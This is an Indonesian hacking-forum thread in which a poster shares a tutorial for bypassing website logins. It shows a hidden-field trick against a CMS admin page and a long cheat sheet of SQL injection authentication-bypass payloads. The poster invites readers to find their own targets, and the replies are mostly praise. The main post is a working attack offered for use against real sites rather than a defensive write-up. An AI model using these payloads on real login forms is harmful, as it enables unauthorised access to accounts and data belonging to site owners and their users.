[Share] Bypass Login Website (SQL)
#1
selamat malam :d
malam ini saya akan mengshare tentang bypass login sebuah website.
perlu di ingat tidak semua website bisa di susupi menggunakan tehnik ini. namun tidak menutup kemungkinan, masih banyak website di sekitar kita yang masih bisa di susupi menggunakan tehnik ini.
sebenarnya tehnikk ini adalah tehnik yang jadul. tapi bagi yang belum tahu, alangkah lebih baiknya kita belajar bersama menggunakan tehnik ini \m/
untuk memberikan pandangan bagaimana membypass sebuah login page agar kita bisa masuk baik sebagai member maupun sebagai administrator, kita harus pahami terlebih dahulu apa yang sebenarnya kita lakukan ini.
bypass login adalah tindakan yang di lakukan oleh attacker untuk masuk kedalam administrator page atau member page menggunakan cheat sheet yang di masukan kedalam form login.
berbeda dengan sql injection yang biasa di gunakan, kita langsung masuk ke administrator page atau member page.

ada banyak cara yang biasa attacker lakukan dalam menggunakan tehnik bypass login website ini. kali ini saya akan membahas 2 di antaranya. yaitu memanfaatkan vuln dari sql injection dan dari kelemahan sebuah CMS.

pertama saya akan membahas yang dari kelemahan sebuah CMS
Spoiler! :
[Image: 1236526_783160841694219_8001398304526532730_n.jpg]
beberapa website yang menggunakan CMS ini bisa kita tembus menggunakan bypass login. caranya adalah, pertama kita masuk ke login admin terlebih dahulu.
Spoiler! :
[Image: 10384030_783160781694225_1262542090772679270_n.jpg]
setelah kita masuk ke admin page, kita inspect element dan cari kata hidden, kemudian ganti dengan kata text, dan tekan enter di keyboard.
Spoiler! :
[Image: 10325608_783160695027567_3071262469670639332_n.jpg]
Spoiler! :
[Image: 1958310_783160715027565_5858864645985018227_n.jpg]
setelah di ubah menjadi text dan di enter, kita bisa langsung klik login pada login page tersebut.
Spoiler! :
[Image: 10394844_783160565027580_4387265360365498897_n.jpg]
kita bisa masuk kedalam halaman administrator.

cara yang kedua adalah memanfaatkan kelemahan dari sql injection.
Spoiler! :
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
anda bisa mengubah-ubah cheat sheet tersebut sesuai kebutuhan.
antara user dan password bisa di samakan. contoh:
username: ' or'1'='1
pass: ' or'1'='1
jadi antara user dan password sama saja tinggal di copas :d

contoh-contohnya:
Spoiler! :
[Image: 10383580_783146761695627_6290178965737943117_n.jpg]
Spoiler! :
[Image: 10325581_783166395026997_652503682828806393_n.jpg]
Spoiler! :
[Image: 10372114_783146678362302_4418655418395293185_n.jpg]
Spoiler! :
[Image: 10402857_783146645028972_9182841512703139912_n.jpg]
Spoiler! :
[Image: 10170744_783146625028974_3400226934700009358_n.jpg]
Spoiler! :
[Image: 1920148_783146528362317_137227529667506962_n.jpg]
Spoiler! :
[Image: 10330371_783146388362331_727295219863022706_n.jpg]
Spoiler! :
[Image: 10411394_783146378362332_7289828762738443119_n.jpg]

NOTE: Tidak semua website bisa di bypass login. silahkan cari target anda sendiri untuk uji coba Confused:-
sekian spam dari saya, bila ada yang kurang berkenan saya mohon maaf. jika ada yang salah, CMIIW :d

#2
kerem om
gue tambah koleknya ya :p
Calon manusia sukses tidak akan pernah mengeluh, tapi akan sibuk memperbaiki diri dari semua kesalahan yang pernah dibuatnya
My Facebook
My Twitter

#3
Perlu dipelajari lebih dalam, terutama sebab akibatnya :p
Salam semarang titip congyang.
Ares TheHopeBuster
http://kurawa.id/ - Panglima Perangnya Indonesian BackTrack Team
Anarchy Penetration Testing!-,

#4
(05-24-2014, 02:47 AM)faizul amali Wrote: kerem om
gue tambah koleknya ya :p

monggo om Smile)

(05-24-2014, 10:14 AM)Ares Wrote: Perlu dipelajari lebih dalam, terutama sebab akibatnya :p
Salam semarang titip congyang.

yups benar sekali. harus di kembangkan \m/
Information Is The Most Dangerous Weapon In The World

#5
nice tuts bro... lumayan buat percobaan wkwkwk, bagus buat dikembangin lagi....

#6
(05-25-2014, 09:17 AM)dimascyber4rt Wrote: nice tuts bro... lumayan buat percobaan wkwkwk, bagus buat dikembangin lagi....

sip bro. silahkan di kembangkan lagi. sapa tau masih banyak bypass" website yang lain. :-bd
Information Is The Most Dangerous Weapon In The World

#7
Kereen..kereen..bisa nambah pengetahuan lagi Big Grin

#8
kurang tahu pasti om. ane juga masih mempelajari tehnik ini. ane taunya untung"an aja om Big Grin
biasanya web yang vuln sql injection juga bisa di serang pake tehnik ini. dan kalau pengen tahu lebih lanjut ada di bagian hardening om. ada scriptnya biar nggak bisa di bypass loginnya.
Information Is The Most Dangerous Weapon In The World

#9
Gambarnya ngga kliatan tu bro ..!

#10
gambarnya ilang tuh om,, ga ada gambarnya






Users browsing this thread: 1 Guest(s)